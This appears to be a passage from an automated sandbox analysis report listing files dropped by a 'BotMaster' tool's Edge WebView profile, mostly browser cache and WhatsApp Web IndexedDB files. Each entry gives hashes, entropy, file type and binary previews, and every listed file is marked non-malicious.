                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\File System\Origins\MANIFEST-000001

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\GPUCache\data_0

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):8192
                                                                                                                                                                                                                Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:MsFl:/F
                                                                                                                                                                                                                MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                                SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                                SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                                SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\GPUCache\data_1

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):270336
                                                                                                                                                                                                                Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                                                                MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                                                                SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                                                                SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                                                                SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\GPUCache\data_2

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):8192
                                                                                                                                                                                                                Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                                MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                                SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                                SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                                SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\GPUCache\data_3

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):8192
                                                                                                                                                                                                                Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                                MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                                SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                                SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                                SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\GPUCache\index

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):262512
                                                                                                                                                                                                                Entropy (8bit):9.47693366977411E-4
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:LsNlRCUa:Ls3RC
                                                                                                                                                                                                                MD5:FAC1A8AA074F9D0BEAD90B2222E71363
                                                                                                                                                                                                                SHA1:0E3617985A989EE8344A9B09C83620AFF6E8F554
                                                                                                                                                                                                                SHA-256:440096241381D20DAAD273217ED94CF0C74237D156094860E53067590DC3EF8C
                                                                                                                                                                                                                SHA-512:EA3DD2C25EE95F47D8FAA64D85DF20F231BB410E198F4A1C664AF34B6B66F2F96FE2FACD373FF9B0C67767552BF9077BD628C9D655639FCE3ECA2C0B6982347A
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.........................................o.q.q/.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\History

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):155648
                                                                                                                                                                                                                Entropy (8bit):0.5957770189008038
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:9BKUhuX0WyejzH+bDoYysX0IxQzjkHtpVJNlYDLjGQLBE3CeE0kE8lPd7:/iXNhH+bDo3iN0j2TVJkXBBE3ybB
                                                                                                                                                                                                                MD5:20E19D07AEB3A71F054FC24081EE3D2B
                                                                                                                                                                                                                SHA1:BB0213EE7134CAB13440EDB9C74DE22C87BED4BB
                                                                                                                                                                                                                SHA-256:6AC2ECA067DA8821A8203695B02C5B62BB7F197E08944FE166C5576FFAEDA094
                                                                                                                                                                                                                SHA-512:9EBF3CB349AB27C00915A4054C383E0AE146E50E62F76979CCD28BB64F175396B486349554478637EBAFF337B5F7931B8220AE104F319271710AF330EE6D4039
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\History-journal

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):8720
                                                                                                                                                                                                                Entropy (8bit):0.2191763562065486
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:Nxj9tFlljq7A/mhWJFuQ3yy7IOWUZVCtdweytllrE9SFcTp4AGbNCV9RUIyr:275fOzVCtd0Xi99pEYy
                                                                                                                                                                                                                MD5:4E7EE188913BCF0F501B3824120B82A9
                                                                                                                                                                                                                SHA1:1FB43EE36FD0666D9572C9DB6D22863A41CBD5E7
                                                                                                                                                                                                                SHA-256:460016D49D04F0B0549E12631AB8586AF48A178BBF7A0CC27E294EFC2FCB44E6
                                                                                                                                                                                                                SHA-512:AFAFF8BE3EA308940AC63F3A8B8388E0B7D1EAC9EFC41C97F2B22514389016924ECD02EA68EBD315B715F95C320989DAAED6FA007B1E35876D53FCAA85DB0489
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:..............@N...&....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\IndexedDB\https_web.whatsapp.com_0.indexeddb.leveldb\000001.dbtmp

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\IndexedDB\https_web.whatsapp.com_0.indexeddb.leveldb\000003.log

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):33237
                                                                                                                                                                                                                Entropy (8bit):4.6801649425440255
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:F5HQw8knMYvyY/Yt+RRjk+qF30JnMLUiEFBHWSzmUn1rwgz:FCw8knMZy2ERj1v5MLUiEFBRn1cgz
                                                                                                                                                                                                                MD5:E3BC781350307E70CD0CF8350689D876
                                                                                                                                                                                                                SHA1:F69EAB67F33C46F25F1FE2A6FCE53087A09A5B01
                                                                                                                                                                                                                SHA-256:AF5F4701272719F455C3E0D52CB32B2E10655E81849FD949AB099A39EC0FAE23
                                                                                                                                                                                                                SHA-512:5C17C48F68C0758A270EE3EBA1AA9CA69AEA0147CF34DB6DAB85A19A4C2A21DCF3EBFD7A74C7934D5890F9A8583AFE0DD07CFDD5A6794ACF7FAB591BD1942D0F
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:. ......................2.......".....................................!..n........................C.......h.t.t.p.s._.w.e.b...w.h.a.t.s.a.p.p...c.o.m._.0.@.1..w.a.w.c.......................-M..............................2.......................2..........................v..............................2....l.o.g.s......2........l.i.n.e......2..........2..........2..........2..........2..........2.............l.o.g.s........2...........................2....................2........2....................2........2....................2........2....................2........2....................2........2....................2........2....................2........2....................2........2.......................l.o.g.s..>......................2..........d.....t.i.m.e.s.t.a.m.p......d...........d.........t.i.m.e.s.t.a.m.p......d...........2....................2...........2....................d.........2....................d.........2....................d.........2....................d.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\IndexedDB\https_web.whatsapp.com_0.indexeddb.leveldb\000004.log

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):3027
                                                                                                                                                                                                                Entropy (8bit):4.018416989100779
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:sTX3Pe3P8lTSBz//dPDdPPbjlXqGqe9VE/KNKon/jSjOPd4XNbNo4gh5cVYaNlHO:onPmPhtlPpPs92qCo0A7p8+9TgO6
                                                                                                                                                                                                                MD5:9988E9C5C1241294CCC4EDA9188B17A7
                                                                                                                                                                                                                SHA1:41E1C8A5606E2951BF39BA3881794EA7AE481A8A
                                                                                                                                                                                                                SHA-256:6769E6763E16774480A0DFAB8CBBDA2E52589E859E8FFA7954AD745D44E65EE4
                                                                                                                                                                                                                SHA-512:C48C7D0CD131A11C83FC6566A090EF22614E0F32DCB930F79250D3682727CF3520CAEC90E591BE05AC6861036C8358B03309CF7EBC3FAAD0A578FA0D36E9F835
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:Y.......................2.......................2.............................Q.......h.t.t.p.s._.w.e.b...w.h.a.t.s.a.p.p...c.o.m._.0.@.1..f.t.s.-.s.t.o.r.a.g.e......2...........X.V.Q.......h.t.t.p.s._.w.e.b...w.h.a.t.s.a.p.p...c.o.m._.0.@.1..f.t.s.-.s.t.o.r.a.g.e.......<..............................2.........2.....................e.k.......................;..-.....................2.......................2.............................S.......h.t.t.p.s._.w.e.b...w.h.a.t.s.a.p.p...c.o.m._.0.@.1..j.o.b.s.-.s.t.o.r.a.g.e......2...........Z.X.S.......h.t.t.p.s._.w.e.b...w.h.a.t.s.a.p.p...c.o.m._.0.@.1..j.o.b.s.-.s.t.o.r.a.g.e.....}.<..............................2.........2.....................ZSv...........................-....................2.......................2.............................e.......h.t.t.p.s._.w.e.b...w.h.a.t.s.a.p.p...c.o.m._.0.@.1..l.r.u.-.m.e.d.i.a.-.s.t.o.r.a.g.e.-.i.d.b......2...........l.j.e.......h.t.t.p.s._.w.e.b...w.h.a.t.s.a.p.p...c.o.m._.0.@.1..l.r.u.-.m.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\IndexedDB\https_web.whatsapp.com_0.indexeddb.leveldb\000005.ldb

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):16318
                                                                                                                                                                                                                Entropy (8bit):6.410042078634911
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:9TGpqfUNBE1xad0zqRurj4AZ1TC1GfVbBHqKQcRJ:FsqfUwx/uYrj1Z1TRN1K67
                                                                                                                                                                                                                MD5:2FAC9E1FCD68EEB3481D56A81104AC90
                                                                                                                                                                                                                SHA1:C13402A113546555E26263E9C1BFE7CF57799C1B
                                                                                                                                                                                                                SHA-256:FA7A11258EFDFD943CEC8D0F6F17E6027FF001B5C066A935E25AE1820614C23E
                                                                                                                                                                                                                SHA-512:3206566CF5C92C5E1D06A028AC1A79CD9A551C3740CFD9B11F430D01AC2DF83F32C9B110E671B7FFE2223B49AC625C7C761620C160122392AA746A352DB6D599
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:. ............$...........................................................................................m..........,............................2...........B.2...........K........................]...R./..)....&..96/...........?..........G.a.....&....G..........2.........&....G........2.G.......&....G..........2.......2......2D. ............_.L)....,.J....*.(.......w.o.r.k.e.r._.w.a.m._.e.v.e.n.t.s...`.M..q......I.C.....C 2.....a.N...".H...".....b.O...".G...".....c.P...".F...".....d.Q...".E...".....e.R...".D...".....f.S.........29*.f.C...2.....g.T...T.B...".....h.U.......A.......! $.......i.V.....$.6....". .#....c%..e=.0m.e.t.a...j.W.0...5......!~.k.X...".4..."!~.l.Y...".3..."!~.m.Z..."a....."!~.n.[."F:..n.1...T.....o.\...T.0..."!..p.]..."./..."!~.q.^..."....."!~.r._..!~.-..=~.....s.`...#."...y....d.....t.a...#.!...#...u.b...#. ...#...v.c......!B]^.v.....3...w.d.............m](........x.e....................>?.....y.f.&!7....57..A5.z.g..."....."A5.{.h..."....."A5.|.i..."....."A5.}.j..

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\IndexedDB\https_web.whatsapp.com_0.indexeddb.leveldb\000006.log

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):488
                                                                                                                                                                                                                Entropy (8bit):3.8471857889102026
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:SCyfk+/KtHA2LIgcgWeKLX4MsOcC/ewLIgcgWeKLX4MsO8ZtlFzkTY/1cgSCeN+5:CCtgDLIMlcNEgDLIMl8TDTcd2lyLO7f
                                                                                                                                                                                                                MD5:E479A772C088AB3FFB260132720072F7
                                                                                                                                                                                                                SHA1:87A1BB9512B30DAB579A88A65A2048900367EE0E
                                                                                                                                                                                                                SHA-256:BBFD8215CCE49539A3BCD1BEE5D716F63A8F0C5A3EA4B70EE4BBCEC89C3C3A12
                                                                                                                                                                                                                SHA-512:FFCB745B8BABC28F09DC9AAF9110842D071807BBF322443A26C5FD84F17E3FFA9458931ABE506CBF99420A5FBAC0074F21695FA90E03CF01383085531BBF307D
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.......?.................2.......................2.............................W.......h.t.t.p.s._.w.e.b...w.h.a.t.s.a.p.p...c.o.m._.0.@.1..w.o.r.k.e.r.-.s.t.o.r.a.g.e......2...........^.\.W.......h.t.t.p.s._.w.e.b...w.h.a.t.s.a.p.p...c.o.m._.0.@.1..w.o.r.k.e.r.-.s.t.o.r.a.g.e...v.>.<..C...........................2.........2.....................UYy....F..................cO?.'..G.................2.................2..*..l>..I.................2.................2.........................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\IndexedDB\https_web.whatsapp.com_0.indexeddb.leveldb\000007.ldb

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1312
                                                                                                                                                                                                                Entropy (8bit):5.8059503693245045
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:EKsE2eMl95IHJqabWgeDLe9FDCO1o849mXWRcvy8H63uTg+FWgz0EnFp9Dt:EKsElE56ua91C+9QSWUBTSEFh
                                                                                                                                                                                                                MD5:142B8E8F43BD3BE96B4FFFF62AE982B2
                                                                                                                                                                                                                SHA1:BB0171FBFB34CF7FCEDB3D35E1B1695EB3006C28
                                                                                                                                                                                                                SHA-256:CE69F690764A629F55C16D86956BC07B30EBCE42E890323F64977B3B2ECB266A
                                                                                                                                                                                                                SHA-512:5D0C5BE599DB557E64B664960A8AC40A0365E93E371F9C037446D3B10574E7E989E59083DD753AED87693ABA22E8ADE0916A5E48BF0F03AD89A24601AA912DFC
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:...........:.........5.........0.....-.......(.....%....... ........................................................................2...9.......... ..............., ..........0.......2$..................2$..................2$..................2$........&......!..2$...............)..2$........6.........2...1..2,..........#...8.$.............;........)H......0.......<. .X... ..V.Q. ....h.t.t.p.s._.w.e.b...w.h.a.t.s.a.p.p...c.o.m._.0.@.1..f..P-.s.t.o.r.a.g.e............l...........E................Z.......X.S..... ..j.o.b.sF....2.....n........!=.................l.......j.e..H..l.r.u.-.m.e.d.i.a>..(.-.i.d.b...2..........................%Y..Z......b..o.f.f.d>......2.....n.........!1......2.......+...X.........q.p.lF....2.....l..................'.%...^..$....\.W...\.(..s.i.g.n.aN....2...".r........!R......../.%...F..,....D.?.....s.w...2...*.Z....a2....I......7.%...X..4..... w.a.w.c._a2(._.e.n.c...2...2.l.... ........U....V..........:!..^........:3........6.ZZ......$..Y!....R7.....\.:%.r.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\IndexedDB\https_web.whatsapp.com_0.indexeddb.leveldb\000008.ldb

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:OpenPGP Public Key
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):8032
                                                                                                                                                                                                                Entropy (8bit):6.467905879357873
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:bJsdRzizRotj11NAVj42i5qJ+EtCgC8GLCOqlw:bmeR65A9Biqpe8GLww
                                                                                                                                                                                                                MD5:F9E8E7140E7E13F623C809C93ECF574F
                                                                                                                                                                                                                SHA1:D1BA7E9FF94E3FE8869A4803766FF683F089B2C5
                                                                                                                                                                                                                SHA-256:0F8387DAB146AF2967F053FDA4145E76BF6F10E1BC7C6158B47D465AB18D7C83
                                                                                                                                                                                                                SHA-512:F475FC1F85C341FAE3682CC725126DF8796911E4BCA24EB88FC40B65A7A91003825F89F8EEBDB2CCA281D19AC19913D19E6C6A2E2584BE5D22C60EB3DFE15EA7
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:. ............$.....................,.........2...3$...........".........:........................&...........6.........o......j.............(.............................Z.......X.S...X...h.t.t.p.s._.w.e.b...w.h.a.t.s.a.p.p...c.o.m._.0.@.1..j.o.b.s.-.s.t.o.r.a.g.e................n.............. .2....... 2...l.......j.e.1..H..l.r.u.-.m.e.d.i.a>..,.-.i.d.b......................!h.......%2h......h..o.f.f.d>......2.....n..................%...X.......V.Q.b....q.p.lF....2.....l................'.%...^..$....\.W..(..s.i.g.n.aN....2...".r........A........./.%...F..,....D.?.....s.w...2...*.Z....a,....)@.....7.%.....X...2..$...4.$... w.a.w.c._a;(._.e.n.c...2...2.l....$........G.......w..a...<:%...w.o.r.k.e.r>.....#...........7.I.......!.$..........A.(.......2.......0l.o.g.s..........<...l.i.n.e........!.....................b.).. .. .........................4....0m.......2...5......v.6...v.7.....8...\...[...!.v.:...4...;..........f..4.l.1.0.n.....g......%a.y.y.h...y.i.....j...y.......l......

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\IndexedDB\https_web.whatsapp.com_0.indexeddb.leveldb\000009.log

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2238
                                                                                                                                                                                                                Entropy (8bit):4.886823517618759
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:Ll5TStQwZuWT0Q5IHUlwfXrvvLG1MTqOe04M:LldStQITlWHXXbDG7H0N
                                                                                                                                                                                                                MD5:E3B0C71C94FA3E42E4F0724BE882F5E0
                                                                                                                                                                                                                SHA1:D01BBD99293DC886F2F2FE9F59A96E86715F4D42
                                                                                                                                                                                                                SHA-256:58154646F7032D1304ABB35BC43E27CB97F9753EB719C64320126D7A00F11CEC
                                                                                                                                                                                                                SHA-512:E63609D2F24EE4DF04EA39DE2CF92641295AF9698B4CCEF02AC2C6CF3B3BE5E313BA6745549D8E9DA176CC1AC9A1CCC16B0E825CC72EF67741D26C2A1F145D94
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:..>.|..M.....................Q.......h.t.t.p.s._.w.e.b...w.h.a.t.s.a.p.p...c.o.m._.0.@.1..w.a.w.c._.d.b._.e.n.c....................Z.cL..Q..........................2. .....................2. .............................T..........................2....k.e.y.s......2........i.d......2..........2..........2..........2..........2..........2.............k.e.y.s........2. .........................2. ..................2........2. ..................2........2. ..................2........2. ..................2........2. ..................2........2. ..................2........2. ..................2........2. ..................2........2. .....................k.e.y.s..y....h..........................2....f.t.s._.h.m.a.c._.k.e.y.s......2........i.d......2..........2..........2..........2..........2..........2..... .......f.t.s._.h.m.a.c._.k.e.y.s........2. .......2. ............................2. ..................2........2. ..................2........2. ..................2........2. .........

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\IndexedDB\https_web.whatsapp.com_0.indexeddb.leveldb\000010.ldb

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):474
                                                                                                                                                                                                                Entropy (8bit):5.1239910928615595
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:12:74TvHqbhC08DLIMlfpgOOxcjW5/AkXFY7:74T/NDLJfpgOOKq/W7
                                                                                                                                                                                                                MD5:6351CF763BD4BA1EC6BBD28E18D186D6
                                                                                                                                                                                                                SHA1:F2B88751D89C3DEED01AFDEBA9855EB278E61836
                                                                                                                                                                                                                SHA-256:8786AAD4747E99B436C110AB9958FCD2F157802144D3330B0106D4FD0DBF072C
                                                                                                                                                                                                                SHA-512:CBC1465A53972266A509A61EFC4B0FD8E231967B4BFD23205FCCFC1710EBD1A6AC9A63D887FAA3653F851A7EF6DAE52A3C236A8C4ACB293B81593A1659393FCF
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:...........F.........C..$.....2...H........D......?..........< ..............G.$.............I........J........!..E..A...........^..B....\.W...X...h.t.t.p.s._.w.e.b...w.h.a.t.s.a.p.p...c.o.m._.0.@.1..w.o.r.k.e.r.-.s.t.o.r.a.g.e..........@.rD.................[.}.N}...A.n ........K..L.....L...............P.X;...0.4....H3....O.............._.".filter.leveldb.BuiltinBloomFilter2.............RB..........L..................j.....0.....................................W...$uG.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\IndexedDB\https_web.whatsapp.com_0.indexeddb.leveldb\000011.ldb

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):7985
                                                                                                                                                                                                                Entropy (8bit):6.4604527020387525
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:E8x9dOCM46+/OdgkTn442i5qftCACh1hD5gc:E8Ps946+xkTn4BiqfWbhDic
                                                                                                                                                                                                                MD5:39EEA25C8DC97EB08EF5B28E387EFFED
                                                                                                                                                                                                                SHA1:45FFDC3BD0C1572CEAD28F2D41A6243571864616
